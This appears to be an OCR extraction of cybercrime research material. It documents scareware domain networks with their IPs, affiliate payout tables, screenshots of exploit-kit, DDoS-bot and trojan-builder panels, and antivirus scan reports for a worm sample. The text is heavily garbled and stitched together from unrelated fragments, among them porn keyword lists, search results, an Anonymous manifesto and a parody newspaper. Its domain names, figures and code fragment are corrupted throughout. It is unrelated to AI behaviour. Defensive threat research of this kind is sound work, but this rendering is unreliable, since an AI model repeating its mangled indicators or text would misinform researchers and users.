ifterent D@Terrent Mewes oflienbew Acetinfielewu ond Marnhese? 


For instance, a sampled domain such as housedomainname .cn/in.cgi?6 redirects us to 
securityonlinedirect .com/scan.php?affid=02083 which is [6]serving scareware with hosting 
courtesy of AS10929 Netelligent Hosting Services Inc, which in case you remember popped-up 
in the [7]Diverse Portfolio of Fake Security Software - Part Twenty. At securityonlineworld .com 


(209.44.126.22) we also have a portfolio of 


thestabilityweb .com 
securityonlineworld .com 
websecuritypolice .com 
wwwsafeexamine .com 
dynamicstabilityexamine .com 


scareware domains: 
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2008-11-16 
2008-11-17 
2008-11-18 
2008-11-19 
2008-11-20 
2008-11-21 
2008-11-22 
2008-11-23 
2008-11-24 
2008-11-25 
2008-11-26 
2008-11-27 
2008-11-28 
2008-11-29 
2008-11-30 


* $/1000 pacuntbisaetca no chopmyne Cymma npoAax + Cymma pe@epanos Ha 1000 nocetnTenet 


2008-11-16 
2008-11-17 
2008-11-18 
2008-11-19 
2008-11-20 
2008-11-21 
2008-11-22 
2008-11-23 
2008-11-24 
2008-11-25 
2008-11-26 
2008-11-27 
2008-11-28 
2008-11-29 
2008-11-30 


* $/1000 pacuntbieaetca no chopmyne Cymma npoAax + Cymma pedepanos Ha 1000 nocetnTeneh 


2971 
3807 
3874 


5323 
5512 


2971 


5323 
5512 


1616 
417 


S31 


1616 
417 


S31 


2) ON Gr Ga sa Na ice) ee) a 


li 


A) a) a a TS OO Te ee oe 


li 
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2115 
135 
240 
2ss 
210 
210 
150 

181.5 
225 

271.5 

271.5 
300 
270 
330 


2115 
135 


41.15 
75.73 
63.04 
65.82 
54.60 
50.54 
68.21 
52.97 
50.87 
62.8 
51.64 
56.99 
$0.72 
59.86 
47,90 


41.15 
75.73 
63.04 
65.82 
54.60 
$0.54 
68.21 
$2.97 
$0.87 
62.8 
51.64 
56.99 
30.72 
59.86 
47.90 
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e vee ARpe® Ane Tpageee Cale Toedex Paro Cynma 
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es a : = 
EbloGenerator ¥.1.2 


interracial amateur vids - 
interracial lesbian amateur 
interracial mature amateur 
If japanese amateur fuck 
‘ japanese amateur lesbian 
fg japanese amateur porn 
ft jay and dougs amateur straight guys 
| ff jessica busty amateur boob 


la jocylyn busty amateur 


> kacieé and amateur allure 


fl karups amateur teen 

| | karups hairy amateur 

| | | karups hardcore amateur 
[ karups hometown amateur 
| [a karups hometown amateur autumn 


fi karups hometown amateur present 
| | | kathleen amateur allure 
[il kenwood amateur radia 
iff large amateur tit 


: 

| 

| 

| 
fil kara facial amateur / 
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HTTP 9-11-information-z.tsessential.ca 

HTTP maOb.info {go2.php? 

HTTP scan-now.org } 

HTTP scan-now.org fimgsiquer 

HTTP scan-now.org fima/jquer 

HTTP scan-now.org fima/001.gif 0 imagesaif 
HTTP scan-now.org jcb.gif ; image/aif 


HTTP scan-now.org —_jimaylistfile. js applicati 


HTTP n-now.org fimgsdrugndrop. js 

HTTP scan-now.org 

HTTP $can-now.org 

HTTP scan-now.org 

HTTP scan-now.org 6.giF image/aif 
HTTP scan: org fime gif image/gif 
HTTP s ow.org fim gif image/gif 
HTTP. scan-now.org 
HTTP scan-now.org Q 3. image/gif 
HTTP scan-now.org ; 048 image/gif 
HTTP scan-now.org 

HTTP scan-now.org 

HTTP scan-now.org fim gif image/gif 
HTTP scan-now.org im if 916 image/aif 
HTTP scan-now.org ima; j 9 image/aif 
HTTP scan-now.org fimg/011. 2,¢ image/gif 
HTTP n-now.org img /010.qiF 3 ge/air 


HTTP Sscan-now.o icb.aif 2 image aif 
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System Tasks System scan progress 


4 View system nformaban 
“. | Shared Cocsnents My Documents 
D Add or remove programs al - 


Boa Secs Hard drives 


File Download - Security Warning (x) 


Other Places 


x Local Desk (C:) 


©) My Network Places 
} My Documents 

C2) Shared Documents 

GB Control Pane! 


Do you want to run of save this file? 


= Name Scarer-32ce_2007.exe 
Type Application, 172KB 


Froen 


DVD-RAM Drive (E:) 


(Cae) Cave) Coes) 


™ Windows Security Alert 


To help protect your computer, Windows Web Security has 
detected trojans and ready to remove them. While files tron the Intennet can be useful, this file type can 
potentially harm your computer. If you do not tust the source, do net 
fun of save this software, What's the risk? 


Detected spyware and adware on your comgetor 


Date Files infected State = 

11.18.2008 % Waiting removal 

11.18.2008 65 Waiting removal 

11.18.2008 = Waiting removal 
* 


a 


Spyware is software, which can gather information from user's computer through 
Irhermet connection and send them to Rs creator. Gathered information can be 
passwords, e-mail addresses and all that data, which is mportart for you. 


your system. Trojan-Downloader stealing passwords, credit cards and other 
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911 Pictures 
17 hours ago - porsche 911 charlotte Pictures porsche 911 charlotte, we have the largest supply 
of used cars with photos in porsche 911 charlotte. ... 

/7911+pictures - Similar 


September 11 Lesson Plans 
16 hours ago - 9/11 Lesson Plan To Be Tested On Students. Tue, 09/08/2009 - 4:19pm 


msnbc.com: Top msnbc.com headlines. Original article Share News Clip - ... 
/?september+11+lesson_.. - Similar 


September 11 
15 hours ago - In support of the 9-11 families struggle for truth. We are a national organization 
calling for a complete investigation into 9-11 and the evidence for Bush ... 

'29september+11 - Similar 


September 11 Facts 

15 hours ago - Sadly, Mariani told us, On September 11, | not only lost my husband Neil, . The 

9-11 widow s distasteful experience on Scarborough Country and facts - ... 
/?september+11+facts - Similar 


9/11 Lesson Plans 

15 hours ago - 9/11 as History Lesson plans, resources, and tips for recognizing the . Search 9 

/11 lesson plans and worksheets to find teacher approved lessons by grade . ... 
/29/11+lesson+plans - Similar 


9 11 Information For Kids 

15 hours ago - Download the 9/11 Service Learning Supplement today by clicking here. For more 

information about the National September 11th Memorial Museum at the World . ... 
/29411+information+fortkids - Similar 


Sept 11 Lesson Plans 

15 hours ago - Attack on America: September 11, 2001. Another Day That Will Live in Infamy 

Helping Students Explore Their Feelings and the Facts about the . ... 
/?sept+11+lesson+plans - Similar 
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FRAGUS | Fites | Sellers | Traffic tinks | Preferences | Logout 


Total statistics: 


WH Ajax autoretoad - 
Admin login: Admin password (if you want to change): 
crccnmieaciiem 
Hosts: 0 


Frags: 0 Default admin panel language: Time for ajax autoreload (in seconds}: 


Percentage: 0% a: 


URLs for normal fuctioning (of the system): 


Url to Fragus: 


http:/ /fragus/fargus 


Redirect to url upon completion: 
http:/ /locathost/Tfinish 


Redirect to url on double visit: 
http:/ /locathost/?doubleip 


Default preferences: 


Ajax check before use next exploit: Default exploits: 


_—_———s eat 


BF aotwinamp directshow 
Default file to load: 


spreadsheet 


Save preferences 


wered by Fragus 
Sales: 99-68-78 
Support: 99-69-78 
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networkstabilityexamine .com 
safetyscansite .com 
onlinesafetyscansite .com 
securityscansite .com 
stabilityonlineskim .com 
socialsecurityscan .com 
securityexamination .com 
internetsecuritymetrics .com 
onlinebrandsecuritys .com 
securityonlinedirect .com 
scanstabilityinternet .com 
stabilityaudit .com 
websecuritybureau .com 
safewebsecurity .com 
webbrowsersecurity .com 
futureinternetsecurity .com 
superiorinternetsecurity .com 


The [8]fake codec at video-info .info (AS29371 - gaztranzitstroyinfo LLC) is in fact down- 
loaded from kir-fileplanet .com - 91.212.65.54 (AS48841; EUROHOST-NET) where more 
malicious activity is easily detected at: 


downloadmax .org - 91.212.65.19 
hd-codec .com 
shotgol .com 
kauitour .com 
coecount .com 
countbiz .com 
videoaaa .net 
7stepsmedia .net 
ispartof .net 
amoretour .net 
browardcount .net 


trucount3000 .com - 91.212.65.10; 91.212.65.29 
trucount3001 .com 

trucount3002 .com 

antivirus-xppro-2009.com 

onlinescanxppp .com 

onlinescanxpp .com 

onlinescanxp .com 

free-webscaners .com 


In cybercriminals | don’t trust. 


Related posts: 

[9]Fake Codec Serving Domains from Digg.com’s Comment Spam Attack 
[10]Lazy Summer Days at UkrTeleGroup Ltd 

[11]Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software 
[12]Massive Blackhat SEO Campaign Serving Scareware 
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elude “functiens h* 
beol AppendTcOrive(string targetDrive, string c 
\ string 
af (Gn 
af (be 
SetPilr 
at(e- 


pais false; 


Book Corer Patrtmetet rtm tarcmt Portree 


int iDrivesFound + 0; char s2Buffer[149); Getlo 
cher *sabrives « szButter: 
while (r==™iee<s 6 


) 


teturn .....--.-..-, 


[42] 


cstr(). “w*); bool bExists = true; 


(>): 
f}2! “shel l\scpen\\Default=i\n*. copii 


TTRE ¥): for dra 
TU PILELATTRIBUTE REAbOMiy) 


saModuleFile)): 
id bastlof ("SN"): 


« \(stretr(sabrives. "B")) > { 
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AQDEOROG 


Quit 


Online Host DDOS Attack Dummyattack Self-attack Update IP Settings buidserver home 
Conventional attack: Web site attacks: Special attacks: Combined attack: New attack: 
[OLJSYN Flood [O2JICMP Flood [O7]Get flood-free [10]Games attack  [13]SYHHUDP Flood (16)Fin Wait! Attack 


(O3]UDP Flood [04)UDPDebris [O8]CCVeri ation ({11]Routingattacks [14]ICMP+ICP Flood (i7)Fin_¥ait2 Attack 
(OSJTCP Flood [O6)TCPMulti-join [O9JHTTPEmpty GET  [12]IHybrid attack [IS]VDP +TCP Connect [18]Established Attack 


Manually select the console mode (task 0) 
Target: http: //wew. target. com/show. asp7id=123 ‘| New on-line attacks 
Port: (80 _—| Type: (08 +*| Thread: (10 +| Quantity:/100 5] ~~ On-Line list of host 


Automatically selects the host mode (unlimited mission mode) 
Type: 03 lw. 


Three{ip [= |Amount:[100 [= ]Tarent-fery.targett. con] Pert:|o0 ] 
IP seer [F) Delete the target 


Account: 


Password 


dencin: [row 382, 


Your IP: 168. 1. lial “To s€op the gos 


Targets can be IP / DNS / «eb 
the need for polling URL as a parameter. 


DNS Example: wew. baidu. con IP Exemple: 202.199.24.35 
UEL Example: http://www. abc. com/show. asp?i d=123 


http://www. abe. com/index. htm 
http://www. abc. com/ 


htt etn hc nw hice A wht 


Wi ndowsXP 


| | Sii6.: 38302 ¥JT-09022313 r 

OD Shene. 5:3133 A127 r eet WindowsXP = 
01 Sa11s.: 32:15844 03 r Sk WindowsXP BS 3) 
C1 S120. - (30:1828 E¥O32 x WindowsXP Sh 
DO Si13:: 39:3400 547839B09D7... I. WindowsXP eh 
DO S61.1- (86:5... a3s r kira WindowsXP = 
OD Sss. s: i7:1224 Pc-20090928... # Bara WindowsXP sh 
0 S222. 38:1382 127 u 1875 WindowsXP = 
0 Sinizs.: 74:3052 004 gE ar WindowsXP cad >| 
D0 S220. 240:6... HBS 2 ea WindowsXP =A 
0 Ss1. 1: (38:6... A0G2 # ‘Frm WindowsXP = 
CO) Shee : 31:1330 FZO80 r ies WindowsXP =| 
C1 S222 : 110:... 109 i Bits) WindowsXP =H 
0 Si121.: 31:1788 AIT r alti WindowsXP . Sh 
OD S60. 1 26:1466 089 = ir WindowskP 2048MB Priva... =H 
0 Sbe18.: 254:2836 Xny-078 7 Darth WindowsXP  2047MB Priva... = 
O Sass. & 17:1225 PC-20090928... # Piel WindowsXP 2047MB Prive... =H) ae 


C WintP ( Win200082003 © JERAIA Cc Bees i Mine HEP HHL | PEE | 
REO: foo ie | epee FEA): ue: rr ee ees — 
"ee 


Ge PEe HIT): uRL: | 


Riameis RSIS) aS (SOTO 7377 AED SaweeEM [14335] 
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B : 
Fle View Favortes Took NoNemeScript Window Help 
Lagi ne n> = > = tle 
Neti ROMnet Jit Jw =| j js & 
r 
3 te 


PWN 112626 
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Cea) 
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[1 
[1 
[1 
[1 
[1 
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3]EstDomains and Intercage VS Cybercrime 

4]The Template-ization of Malware Serving Sites 

5]The Template-ization of Malware Serving Sites - Part Two 
6]Malware campaign at YouTube uses social engineering tricks 
7|Poisoned Search Queries at Google Video Serving Malware 
8]Syndicating Google Trends Keywords for Blackhat SEO 


Related Russian Business Network coverage: 


[1 
[2 
[2 
[2 
[2 
[2 
[2 
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[3 
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9]The New Media Malware Gang - Part Four 

O]JThe New Media Malware Gang - Part Three 

1]The New Media Malware Gang - Part Two 

2]The New Media Malware Gang 

3]Rogue RBN Software Pushed Through Blackhat SEO 
4]RBN’s Phishing Activities 

5]RBN’s Puppets Need Their Master 

6]RBN’s Fake Account Suspended Notices 

7]A Diverse Portfolio of Fake Security Software 

8]Go to Sleep, Go to Sleep my Little RBN 

9]Exposing the Russian Business Network 
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go to create a feeling of legitimacy of their enterprise. 
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www.download com/ZoneAlarm-F irewall-Windows-2000-XP-/3000-10435_4-10039884 htm! - 
111k - In cache - Gelijewaardige pagina’s 


Int - Fri « [ Vertaal deze pagina } 


So orp gorge np ey er ep pepe an Internet connection 
during installation for the full download of the ZoneAlarm ... 

www download -imemet-Security-Suite/3000-8022_4-10291278 html - 100k - 
In cache - Gelakw e@ paging’s 

Meer resultaten van www download com » 
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Advanced 


Virus Remover 


TRIAL VERSION 


tered trademark. All rights 
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2006 


seemery chi 


Volare 45 - N° 588 
evade Sones 


carded cau de toilette vibes, 
Purcell dispersedelements, moi- 
sturizer tube-cyes, travel-size 
shan'ts, lotto tube-cyes and 
other cosmisms collect outside 
airspeed .seder checkweigh- 
mans, in a kindling of fluidizer 
and fragrant moochcr to 
lifeboatman in the agency of 

No more tootsy or moveabil- 
ity onboard, Hair gel and 
skinhead creams, like other 
liquiduses, gelatinisers or lott- 
‘os, must be packed in 


Che Arcade Wire 


sony ill All the News that's Fit to Play ~ 
——————— ae a ee ee 


LIQUID TERROR 
Airport Security Upgrades 
pe Confound 


HEADLINES 
Aitped Gaouriey 
Please Wait 
Colorful mountaincers of dis- Enforcement has loosened 


slightly since rcsublimations 
were imposed by the Transpar- 
tation Security Administration, 
after a grouscberry of peoples 
suspected of plotting middle 
exports with simple cart 
liquiduses were arrested in 
Englisher. 

Sail, the mountaincer outside 
seder necdiecraft necd not 
grow. And for those who arc 
too busy to stand at baggy 
carpenterias to collect checked 
lugworms, there is still a way- 


leave to take bebeerine onboard 


Extra! 
Greal Morning 

2 Sections - 0 come 
Pereatve Garner Cor 
The Ancads Wire Seria 
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Al-Qaeda 
= 
Iraq 
oe | a | | Bean Go oe 
Group 

Egypt Algeria Egypt Ecypt 

Islamic Movement of Hizhallah Jemaah Islamiah (J Harakat ul Mujahidin 
Uzbekistan Israel Indonesia Pakistan 

tse 


Philippines 
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nicdaheb .cn - 91.212.41.119 
sehmadac .cn 
vavgurac .cn 
tixleloc .cn 
xidsasuc .cn 
cuzlumif .cn 
teyrebuf .cn 
hifgejig .cn 
tukhemaj .cn 
rogkadej .cn 
wuhwasum .cn 
sipcojeq .cn 
tixwagogq .cn 
silzefos .cn 
popyodiw .cn 


cakpapaz .cn 
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BSREBUERRSSEZE 


5 ane & Gaawerne 


SE handler installation 


nevort._o__fnode 
nevert.__o__conmode 


de>? 


Frode >2 


2 
9 
~ 
: 


A eISS4SRSKBNS STR 
Ape SESSESESESARIE 
Pee eeeeee cece cess sess e tenes eenennes IEXIINGTSSIIGE 


fe 


J - main thread, module miranda3] 


[138] 


22523 


digitalblasphemy.com 
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Fight for your right to free s 


Demand Speak Up Link 


"Ye look aloft when ye long for exaltation. 
I look downward because I am exalted. 


Hello, Kevin Rudd. We are Anonymous. We have been watching you 


It wasn't very long ago since you were elected, was &t? The media hype surrounding your future government back 


mm 2007 was incredible. Many of us Austrahans saw both you and Barack as beacons of potential to bring end to 


the conservative culture that currently swamps the USA and Australia. Many of us thought otherwise, and # turns 


out they were right 


You, as a leader, have failed us. You are bringing an end tc at is the greatest link between all people; the one 


thing that can cre all cultural boundanes, that can bring nicty, politcal or religeous 


standengs, dass 


rationality; the largest information transfe r created. You, a democratically elected leader 


have decided to do what only the most 


2r-hungry of all tyrants dare 


You have opted to censor the internet 


This is why we, Anonymous, have deaded that this censorship plan should be among our primary targets for 


elimination. We have two demands that we consider central to our ideals 


Fstly: We demand the ensorship plan proposed by the current government. This includes the 


removal of all targ and complete abandonment of any further plans and endeavors by the 


Austrahan Government to censor the mternet 
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Server name Server P Comp. / User os CAM First execute Version Port Ping 
GS) Vitima_14888... 192.168.254.20.. COBAI/Admini.. Windows XP Se... No 05/10/2008 - 18:40 Pubic0.. 80 0 


: 5 [V] Hide fie : 
ONS / P (Max.: 20 Address): Install name: (0] Change aan (¥) Anti Vietwal PC 
stearcarmarioa thd (Q)  trewanexe (J) Met server [Anti vuware 
Password: | address bst 
—— 192.168.254.1 
Port 
60 
Startup methods 
Key name; 
@ ActiveX StartUp {38C6J04M-WRGY-PO7E-4E54-W 136WWEVEETH) & a 
eT SE Mutex name: 
© HKCUsrun Windows Frewal | © Both methods © Don't StartUp 
[144] 
Your Purchase is Backed By Fully Secure & Encrypted Your Email Address and 
Our 30-DayMoney Back Ordering - Even Safer Personal Information are 
Guarantee! Than Over the Phone. private and NEVER resold. 
a & + 3 Gs oO 
ra Antivirus Plus Total: $51.45 
- Product Purchase Form (transaction amount:$49.95, 
activation fee: $1.50) 
: m= nl detail =e ; 
SS i pipe oul cia coved Ter Cancale) 
Nome: es 0 a 
Indirizzo: Co) Numero dicta: 
Emittente: |i eeSISSRSSRSESES aici 
stato: =e 
Pinta tette 7 anes 
postale: 
Paese: United States of America cve2/cw2 CR ar 
PLEASE DO NOT USE us.army.md E-MAILS, 
Telefono: CT) Yaar onder cxctd be detoyer 
Also check your bulk or spam folder in case you do 
E-mail: [ti( rt~—‘“SCSCOCCCOYT not receive confirmation e-mail regarding your order 
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4 APDFPR Professional Edition 
File Recovery Help 
> : e 
&. nam was %§ @ @ 
Open Start ! Stop Benchmark Upgrade Help About Quit 
Encrypted PDF-file Type of attack 


C:\My Documents‘\report. pdf 4 Key search 


Brute-force 


Range | Length) Dictionary Key search 
Key search options Raucsauch 


Start from block: End atblock: = [55505 | (Max value = 65535) 


Document key: | SEE 44838EE | 33 


[¥] Use pre-computed hash tables 
(G:ARAINBOW_PDF 


Status window 


08.10.2007 18:27:08 - APDFPR 4.00 build 100 launched 

08.10.2007 18:27:44 - File "C:\My Documents\report. pdf" opened. 

08.10.2007 18:27:44 - Handler: Acrobat Standard (Standard) 40-bit security v.1. 
08.10.2007 18:27:44 - Auto-save directory not defined. Using path: C:\My Documents’, 


Current password: Average speed: 
Time elapsed: Time remaining: 
Progress indicator 


APDFPR version 4.00 (c) 2001-2007 ElcomSoft Co.Ltd. 
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altitude-groupli.com 
fecunda-group.com 
tnmaroups¥c.net 
augmentgroup.net 
asperitygroup.net 
luxor -groupinc. tw 
Foreaimgroupinc. tw 
augmentgroupinc. tw 


arvina-groupco, tw 


optimus-grou 
fecunda-groupmain.tw 
altitude-groupmain.tw 


optimusgroupn 
spark-grot 
foreaim-group.com 


impact-groupnet.com 


impact-g oupinc net 


nda-groupmain.net 
groupmain.net 
fecundagrouplle. tw 
arvina-groupinc.tw 
synapse-groupinc, tw 
asperitygroupinc. tw 
augment-groupmain. tw 
¥-groupmain. tw 


-groupco, ty 
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104,106.30 
104,106 
104,106 
104,106 
104,106 
104,106 
104,106 
104,10 
104.106 
104,106 


04,106.30 
104,106,30 
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4.2. The present Agreement signed by the means of facsimile or e-mail communication, stands good 
in law. The present Agreement shall remain in force from the moment if it’s signing by the Parties 
¥ " 2010) for the period of | (one) year, unless terminates earlier (with | 


(one) week before notice required) in accordance with the terms of this Agreement. 


By: 


Contractor's signature here 


Contractor's first and last name hare 


By: ASAP Financial Group Pty Ltd, 
3 Reading Ln, East Killara, 
NSW, 2122, Australia. 


ABN: 36 138 034 830 
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Total downloads: 991592 


Lastupdate Tuesday, May 19, 2008 
Total virus records 728674 tema 


eoaae Pe taco 


*y TRUE LIFE STORIES: 


© Steve J of New York had hws software prqed 
stolen through a toyan that got into his computer 
through some internet ste Steve is still suffering 


trom a strong depression _ 


© Jason W was tred because he has been visiting 
some proh@ited evternet stes form an office 
cornputer. Mis boss opened the wed browser's 
Pustory and saw all the stes Jason has been 


visting Jason is stil unemployed... 


Rogue security software: 


purposely bul spyware removal tool such as Antivirus + car’ 


~ Antivirus + features: 


© Spyware removal . detects and removes spyware programs and 
trojan horses instatied on your PC 

© Homepage Monitor Tool - browser Hijackers, belomping to the family of 
spyware and adware, are capable of taking contro! over your 
homepage and other tavonte pages. and set an unknown website as 
your homepage 

© System clean-up - clirwnates the races of your syste activites 

© Disc clean-up - seaurely Gestoys all the Gata on your old hard disc 

© Quarantine - The inteced files tat cannot be fixed or deleted are 
mowed to a quarantine folder and Guplayed on the Quarantine pane 
of AntiVirus 

© User-friendly Ward Mode . the Quick Scan Wizard will help you run 
@ scan in the basic scan modes 

© Autorun Tool - if you want lo know what apelications run automatically 
on your system after Window's boots, 

© Open Port Tool . without a protective applceton, your system es 
Gelenseless and becomes highly vulnerable to Trojan programs 

© Many other features 


3 Is my PC infected with SpyWare? 


Q Do you receive a large quantity of SPAM (unsotiated 
agvenisements)? 

© Your PC is running extremely slow? 

Q You are pestered by hose horrible popup ads” 

Q Your homepage keeps changing? 

QO: New iors appear om your desktop? 

Q: Do you get toolmars in your browser that you dont want? 

@. Do you download any must files forn the intermet? 

Q Deo you downioed and mstall free software for the inemet? 
Q: De you use any P2P fle exchange systems (P2P} - for example 
iieerent DeTerreet Mewes oflianbew Acetinfieiewu ond Marnhece? 


addedantivirusonline .com - 91.212.41.114 


addedantivirusstore .com 
addedantiviruslive.com 
addedantiviruspro.com 
countedantiviruspro.com 
myplusantiviruspro.com 
easyaddedantivirus.com 
yourcountedantivirus.com 
bestcountedantivirus.com 


yourplusantivirus.com 
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altitudegroupinc.tw 
aspe group.com 
fecundagrouplle.tw 
fecunda-groupmain.net 
foreaimgroup.net 
tnm-group. tw 
altitude-groupli.com 
altitude-groupmain 
amplitude-groupmain. 
peritygroupinc, tw 
a-groupnet. tw 
a-groupinc, tw 
augmentgroup.net 


arvina-groupnet.cc 
augment-group.com 
roupmain. tw 
nda-groupmain. tw 
fore group.com 
foreaimaroupinc. tw 
impact-groupnet.com 
luxor-groupinc. cc 
luxor-groupinc. tw 
optimusgroupnet,cc 
ina-groupinc. tw 
ygroup.net 
groupmain, tw 


augmentgroupinc. tw 


augment-groupmain. tw 
group 
nda-group 
impact-gre 
groupin 


upli.com 
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3.112 


.143.112 
.143.112 
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Phishing attacks - Select TLDs targeted 
by ROCK Phish 


a 

er 

= 

- — 

= Hong Kong 
2 —@-— UK 

= —i— Spain 


200801 200802 200803 200804 200805 200806 
Month 
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tegn.rer 
2009-07-22 16:06:32 
finished 
Reselt: 0/17 returns infected status 


Antivirus 
AV check F-Prot 3.16.16 2009-3-32 19:24:7 ok Login information 

BitDefender 7.60625 2009-7-22 13:25:8 ot @ 2.6 
AVG 7.5.51 2009-S-1 1:15:42 ok 
F-Secure unknown 2009-722 16:0:30 ok 
Panda unknown 2009-721 9:49:28 ok Tariff 
Sophos AV 4.41.0 2009-722 16:1:1 ok re 
Orweb 4.44, 1,0808200 2009-722 16:0:8 ob iwi tariff 
Vexira vascan 1.34 2009-6-8 18:12:38 ok 
clamav 0.95,1/9604 2009-7-22 4:24:36 ob 
Avast! 090721-0 2009-7-22 0:0:11 ok 
KAY 5.7.20 2009-7-22 18:35:57 ok 
Avira 2.1.12-160 2009-7-22 14:20:13 ob 
Vba32 3.12.7 2009-7-22 16:6:5 ob 
McAfee VirusScan v5.20.0 2009-7-21 8:30:0 ok 

U repo Arcair 1.0.5 2009-7-21 19:5:8 ok 

Qhistol — ESETS Nod32 2.71.10 2009-6-13 23:45:15 


Norman VC 7.00.00 2009-3-24 37:54:18 


Additional information: 


file size: 1086 bytes 
at] MOS: Id2PeLb 9402495 IGObcabH666CHb63 
SMALL: bdObfB3212 7H GIO ZED SICSEIZS1G4 2041 760 
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Ech nO-ameMy MHEHHIO PESYNbTAaTo! NPOBEpKH HE COOTBETCTByIOT ACHCTOKTENDHOCTH, NOMaNyACTS, 
o6parurece 6 cynnopr (ICQ: 536636) « onvumre npoinemy. 3a NOMOm» © YCTPanenHn HeEAoYeTOD rapantHpooan Gonyc. 


File info: 


ALIAS 


Antivirus Version Result 
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home blog products contacts 


a Navigation Menu 
» Scan a File 
» Sample report 
» Help 


» About this Service 
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—_ 
STATUS: Finished a 


File Information 
Report Generated: 
Time for scan: 


File Name: 


File Size: 

MD5 Hash: 
SHA1 Hash: 
Detection Rate: 
Status: 


Antivirus 
a-squared 
Avira AntiVir 
Avast 

AVG 
BitDefender 
ClamAV 
Comodo 

Or. Web 
Ewido 
F-PROT6 
tkarus T3 
Kaspersky 
McAfee 
NOD32 v3 


22.7.2009 at 16.35.14 (GMT 1) 


54 seconds 

!sign.rar 

1 kB 

3d23e1 b9f402495388bc a6c6666c6b61 
BFDOBFS832117C8163826BA3C5E925F 1D4A04176C 

5 on 22 (22.72%) 

INFECTED 

Sig version Engine Version Result 
22/07/2009 45.03 Worm. ZhelatinilK 
7.1.5.12 7.6.0.59 WORM/Zhelatin.Gen 


090721-0 48.1229 
270,13,22/2253 8.0.0.0 
22/07/2009 7.0.0.2565 
22/07/2009 0.95.1 


1725 3.10.529 

22/07 2009 50 

22/07/2009 4.0.0.2 

20090722 4.4.4 56 W32/Zbot.|.genlEldorado 
22/07/2009 1001044 Worm Zhelatin 


22/07/2009 8.0.0.357 
21/07/2009 §.1.0.0 
4267 3,0.677 - 
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@alinw ana nporepen| O630p_ | Upload | 
VirSCAN.org 1, Bet mooKeTe BbICbanaTe Dalints ANA Nporepan pasmepom Ke Gonee 20 uO. 


submit & scan your file 2, VirSCAN noanep-xmeaet RariZip cata, 40 we Gonee 20-™ daanoe 
3, ViFSCAN MOmeT NPOREPATS CRATE aline! CO ChEANOUMMK NapoNAMn Infected’ wnw Virus’ 


File information Pnanroe meno 


FileName 
File Sze 
File Ste 

MD5 


Trasnan crparna 


Meibopmaiyan o VirSCAN 
Orver 


SHAI Cogeficrane VieSCAN 


CooGupits 06 ownbKe 
Scanner results Odpatnan cea 


Scanner results | Sapaxrenne Qaiine: we OOKapprenes nie OQniee w9 Ceanepos! 
Time: 1970/01/01 03:00:00 (MSI) 


Scammer Engine Ver Sig Ver Sig Date Scanresut 
Tiprearimere: Amos Sain yao NPOKOANN NPOREERY paNNE. COOTSETCTEEHESD, OTHET 0 Cxme@on men me GyAcT AOGRE NEM © Gary Aareec 
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© Meetepen creer §«Demencherk «Taped «= FAQ) Rept ieteneryeee = Menoreen cot 


Cowra 43 9TOT nor 
pee Pgenewes mente 


aes 
eA C8200 160829 «alee Worm 2netnan 
ap) punched ene Worn Zhen 
—_ 08.08 2009 ° 
Sieterde 09.00.2009 - 
Bae 
‘corer 09.00 2009 * 
“nue 
etnat vmmD - 
an 0% On 2009 : 
Gwe =O TD 
Fave 8 08 Jo SS ad Froud warty a) 
zw <WYIQITDOR L gueviicionacto 
(geen, net Gurtectitio}> 
ap patched exe (Found secunty eck} 
<WIQITBOR L gueviliioe acto 
(gener, ret dertectatte)> 
Aqured == 09.00.2009 ape Worn Zhetine: 
1403.08 
a_patched exe Worn Zhetearei 
Twdtoo «6 ORO) * 
1200. 
some on.on.2009 ope Contains Getector pattern 
qo0en of the worm 
WORM) That Ger 
a _patched one Contains Getection pattern 
Of he worre 
WORM TIAA. Ger 
tan at bees ‘ 
ores wos Tsoc 
ves (06.00 2009 e 
me 09-09. 2009 3829 : 
va (Oh 20) 1809 . 
Mason 8 08 20) . 
ore 03.08.3008 . 
song? 
Wabote §=09.08.2000 . 
uv 00.08.2009 _e Trowe Horse 
ioore (98.2009 6 wee - 
oreee «BRE; 
Nowrany TARO UTED | age Tropn WAyTibe Coe () 
me at Dees . 
seam 0mO 
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Aaremit alin yee moneepranca npowepKe. Hiexe mpneogatca nonyyennme 
paree pesynbTater. 


Vina Sarna: Isgn.rer 


Crarye: Cranposonne senepweno, 5 cxanepoe > 21 OSHapy XH” 
OpenoMmocemi KOA. 


Boema: Cpa 22 Mon 2009 11:40:16 (CET) Commen no pepynprares 


@ArcaVir 2003-07-22 Hevero ne nazAeno 
(EEC) 2009-07-22 worm. zhelatinttk 
ae BE 2009-07-21 Hevero ne nazqeno 

BW WG 2009-07-22 Hevero ne nazqeno 
QAaIVi® = 2009-07-22 WORM/Zhelatin.Gen 
Qdtdeender 2909.07-22 Hevero ne nazqeno 
BP Clem AV 2009-07-22 Hevero we HaAReNO 

Oc 2009-07-22 Hevero ne waaaqeno 
(@Drwes" 2009-07-22 Hevero ne HamAeno 

@EPROT 2009-07-21 W32/Zbot.I.genlEldorado 

VR-SECURE 2009-07-22 Hevero ne MamQeno 
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1088 Goitr 

RAR archive date, vid, os: Win32 
IS2Ie1b940246953GHbcabch646bcHd61 
bfd0bf63211708163826be3cSe925f1d42041760 


2009-07-22 Nvvero we naaqeno 
2009-07-22 Worm.Zhelatin 
2009-07-22 Hevero we nabqeno 
2009-07-21 Nevero we naaqeno 
2009-07-21 W32/Tibs.DIMX 
2009-07-21 Hevero we nakgeno 
2009-07-22 Huvero ne nakgewo 
2009-07-22 Hesero we nabqeno 
2009-07-21 Nevero we nakqeno 


© 2009-07-21 Husere ne naaaeno 
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VIRUS 
TOTAL 


Virustotal - cepBuc, KOTOpbIA aHanusupyeT 
nogosputTenbHbie cdavinbi wn obneryaeT 
6bicTpoe oObkapyKeHNe BUPYCOB, YepBeli, 
TPOAHOB M BCeX BUYOB BPeAOHOCHbIX NPOrpamM, 
onpegenrembix aHTMBupycamn. [logpobxee. 


@aitn _sign.rar nonyyeH 2009.07.22 09:46:21 (UTC) 
TeKyUMA CTaTyC: 3AKOHYe@HO 


a-squared 
AhnLab-¥3 
AntiVir 
Antiy-AVL 
Authentiua 
Avast 

AYG 
BitDefender 
CAT-QuickHeal 
ClamAV 
Comodo 
DrWeb 

eSafe 
eTrust-Ver 
F-Prot 
F-Secure 
Fortinet 
GData 
Ikarus 
Jiangein 
KiAntiVirus 


PesynbTarT: 11/41 (26.83%) 


Bepcna 
4.5.0.24 
$.0.0.2 
7.9.0.222 
2.0.3.7 
$.1.2.4 
4.8.1335.0 
8.5.0.387 
7.2 

10.00 
0.94.1 

1729 
$.0.0.12182 
